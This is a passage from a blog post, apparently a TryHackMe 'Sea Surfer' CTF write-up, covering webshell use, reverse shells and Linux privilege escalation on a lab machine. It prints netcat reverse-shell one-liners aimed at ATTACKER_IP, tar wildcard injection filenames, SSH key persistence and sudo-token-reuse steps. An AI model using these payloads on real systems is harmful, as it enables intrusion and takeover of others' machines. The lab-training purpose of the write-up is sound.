src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/shell_onWeb.png" alt="Shell.php" /></p><p>So, I could execute the command by using the webshell that I uploaded. So I created a reverse shell with the following encoded command:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20ATTACKER_IP%208080%20%3E%2Ftmp%2Ff
</pre></table></code></div></div><blockquote><p>Change the “ATTACKER_IP” with your IP</p></blockquote><p>That decoded was:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">rm</span> /tmp/f<span class="p">;</span><span class="nb">mkfifo</span> /tmp/f<span class="p">;</span><span class="nb">cat</span> /tmp/f|/bin/bash <span class="nt">-i</span> 2&gt;&amp;1|nc ATTACKER_IP 8080 <span class="o">&gt;</span>/tmp/f
</pre></table></code></div></div><p>So, I started a netcat listener <code class="language-plaintext highlighter-rouge">nc -lnvp 8080</code> and I navigated this URL with my payload</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://seasurfer.thm/wp-content/uploads/2022/06/shell.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20ATTACKER_IP%208080%20%3E%2Ftmp%2Ff
</pre></table></code></div></div><p>I got the access as <strong>www-data</strong>: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/reverse_shell_www-data.png" alt="www-data access" /></p><h2 id="kyle-access"><span style="color: var(--link-color);">Kyle Access</span></h2><p>In order to get the access as Kyle, I began to see if I could find some interesting files and I got a file called <strong>backup.sh</strong> in <strong>/var/www/internal/maintenance</strong>:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>www-data@seasurfer:/var/www/internal/maintenance$ cat backup.sh
cat backup.sh
#!/bin/bash

# Brandon complained about losing _one_ receipt when we had 5 minutes of downtime, set this to run every minute now &gt;:D
# Still need to come up with a better backup system, perhaps a cloud provider?

cd /var/www/internal/invoices
tar -zcf /home/kyle/backups/invoices.tgz *
</pre></table></code></div></div><p>So, this file is executed every minute, and I could use it to access kyle since the wildcard * of tar command has a known <a href="https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/">exploit</a>.</p><p>Indeed I ran the following command to create a reverse shell as kyle:</p><p>The script enter in the path <strong>/var/www/internal/invoices</strong>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">cd</span> /var/www/internal/invoices
</pre></table></code></div></div><p>Then the following command to create a shell.sh containing the payload to create a reverse shell:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"mkfifo /tmp/lhennp; nc ATTACKER_IP 1234 0&lt;/tmp/lhennp | /bin/sh &gt;/tmp/lhennp 2&gt;&amp;1; rm /tmp/lhennp"</span> <span class="o">&gt;</span> shell.sh
</pre></table></code></div></div><p>The <strong>–checkpoint-action</strong> option specify the program which will be executed. the <strong>–checkpoint-action=ACTION</strong> option execute ACTION on each checkpoint</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">""</span> <span class="o">&gt;</span> <span class="s2">"--checkpoint-action=exec=sh shell.sh"</span>
<span class="nb">echo</span> <span class="s2">""</span> <span class="o">&gt;</span> <span class="nt">--checkpoint</span><span class="o">=</span>1
</pre></table></code></div></div><p>I start a netcat listener and I got a reverse shell as kyle:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/reverse_shell_kyle.png" alt="www-data access" /></p><p>To have a stable shell, I create a key with ssh-keygen and then I copied the public key on the authorized_keys file of kyle (in <code class="language-plaintext highlighter-rouge">/home/kyle/.ssh</code>)</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzLsZsSias0FgDPCbdZBMlsSbc0+g/ttUgFAhgmTHI1c2RODCAcNTNTAyG903SWHcyKSjRg5RdzHtTZn5iP7Y8D4SUIEPmz2zzjkk3X2Z53OZNXhS1jnBTF7H9x7KHzoiO4bRJTfRY11jijvCWdSiQHOwS36utR+F6Qt7d4qhBbwZuhoQC53CDQToQ+LdjoXxVjceFwt4VmhatcpY8ZKL3iD9jh5uFVlbg5m5qET2nQbF7xUFveiaS+UGVRnBxzGhK3eAQwSrMYPowtg5+9+sc6yTFYKxzjpJ35EtT+0WlLFomClqavXEn0lfQ4sHQk+5a9WHH4L1sZPxwb2DP8zXE6QrBPnV3ty6asljZeHd1+1n1QyytZhdMs6hzlWuGyXC7bg7hOStxLjganD7dosqbGnqI2BGodwY2pegdsiTSNPnRNtptaMTOJr/jb/zL78yg21XtIWyMpzQrE+97KwIMAhh7ipnurwwsZjuoxi4GUkAYj7G5RBhrsldGLX4cttk= kali@kali
"</span> <span class="o">&gt;&gt;</span> authorized_keys
</pre></table></code></div></div><p>Then I gave permission to the private key and I used it to login as kyle:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">chmod </span>600 id_rsa_kyle
kali@kali:~/Documents/TryHackMe/SeaSurfer<span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa_kyle kyle@10.10.46.100
</pre></table></code></div></div><h2 id="privilege-escalation"><span style="color: var(--link-color);">Privilege Escalation</span></h2><p>The Privilege Escalation was the sudo token reuse. Indeed by watching the output of LinPEAS I could note the following output:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/linpeas_sudo_token.png" alt="Linpeas Output" /></p><p>I read the attack on <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens">HackTricks</a> and it writes “In the scenario where you have a shell as a user with sudo privileges but you don’t know the password of the user, you can wait for him to execute some command using sudo”. This is the scenario that I had because I had user kyle but I didn’t have his password.</p><p>For this attack I needed <strong>gdb</strong> so I downloaded the .deb file from <a href="https://packages.ubuntu.com/focal/amd64/gdb/download">here</a> and then I installed on the machine with the following command:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>dpkg <span class="nt">-x</span> gdb_9.1-0ubuntu1_amd64.deb ~
</pre></table></code></div></div><p>I used this command because I didn’t have the possibility to use sudo, so in this way, I could install package without sudo privilege. So, this command installed the .deb file in <strong>/home/kyle</strong>. Indeed, in the kyle’s home I had the <strong>usr</strong> folder:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/home_kyle.png" alt="Home Kyle" /></p><p>Gdb was in that folder (exactly in /home/kyle/usr/bin/gdb).</p><blockquote><p>Tips: If you want to install in some other folder, you need to change the path in the command but you need to have the writing permission, for this, I choose kyle’s home: dpkg -x gdb_9.1-0ubuntu1_amd64.deb PATH_IN_WHICH_YOU_WHAT_INSTALL</p></blockquote><p>After the gdb installation, I needed the exploit that HackTricks cited and you can find <a href="https://github.com/nongiach/sudo_inject">here</a>. So, I downloaded the git project and I uploaded the <strong>exploit.sh</strong>. I executed it:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/exploit_sh_sudo_token.png" alt="Exploit.sh" /></p><p>And then I checked if it worked and I got root access:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/root_access.png" alt="Root Access" /></p><p>I suggest reading also this <a href="https://github.com/lassidev/writeups/blob/main/TryHackMe/Sea%20Surfer.md">Writeup</a> in which the attacks are explained very very well!</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>WriteUp</a>, <a href='/categories/tryhackme/'>TryHackMe</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/seasurfer/" class="post-tag no-text-decoration" >SeaSurfer</a> <a href="/tags/tryhackme/" class="post-tag no-text-decoration" >TryHackMe</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >WriteUp</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Sea Surfer - CinnamonSec&url=https://nananan.github.io/posts/seasurfer/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Sea Surfer - CinnamonSec&u=https://nananan.github.io/posts/seasurfer/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Sea Surfer - CinnamonSec&url=https://nananan.github.io/posts/seasurfer/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/kerberos/">The Kerberos grand hotel</a><li><a href="/posts/steel-mountain/">Steel Mountain</a><li><a href="/posts/windows-privesc-arena/">Windows PrivEsc Arena</a><li><a href="/posts/alfred/">Alfred</a><li><a href="/posts/thin-job/">Thin Job</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/writeup/">WriteUp</a> <a class="post-tag" href="/tags/tryhackme/">TryHackMe</a> <a class="post-tag" href="/tags/learn/">Learn</a> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/alfred/">Alfred</a> <a class="post-tag" href="/tags/cronjob/">CronJob</a> <a class="post-tag" href="/tags/cve-2021-43397/">CVE-2021-43397</a> <a class="post-tag" href="/tags/cve/">CVE</a> <a class="post-tag" href="/tags/exploit/">Exploit</a> <a class="post-tag" href="/tags/filethingie/">FileThingie</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/steel-mountain/"><div class="card-body"> <span class="timeago small" > Mar 28, 2021 <i class="unloaded">2021-03-28T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Steel Mountain</h3><div class="text-muted small"><p> Steel Mountain In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administr...</p></div></div></a></div><div class="card"> <a href="/posts/windows-privesc-arena/"><div class="card-body"> <span class="timeago small" > Mar 30, 2021 <i class="unloaded">2021-03-30T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Windows PrivEsc Arena</h3><div class="text-muted small"><p> Windows PrivEsc Arena Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. [Task 1] - Connecting to TryHackMe network You don’t need me to do this...</p></div></div></a></div><div class="card"> <a href="/posts/alfred/"><div class="card-body"> <span class="timeago small" > Apr 2, 2021 <i class="unloaded">2021-04-02T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Alfred</h3><div class="text-muted small"><p> Alfred In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/ollie/" class="btn btn-outline-primary" prompt="Older"><p>Ollie</p></a> <a href="/posts/api-pentest/" class="btn btn-outline-primary" prompt="Newer"><p>API Pentest</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('.post-content img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://twitter.com/_cinnamon_92">Eliana Cannella</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/writeup/">WriteUp</a> <a class="post-tag" href="/tags/tryhackme/">TryHackMe</a> <a class="post-tag" href="/tags/learn/">Learn</a> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/alfred/">Alfred</a> <a class="post-tag" href="/tags/cronjob/">CronJob</a> <a class="post-tag" href="/tags/cve-2021-43397/">CVE 2021 43397</a> <a class="post-tag" href="/tags/cve/">CVE</a> <a class="post-tag" href="/tags/exploit/">Exploit</a> <a class="post-tag" href="/tags/filethingie/">FileThingie</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://nananan.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
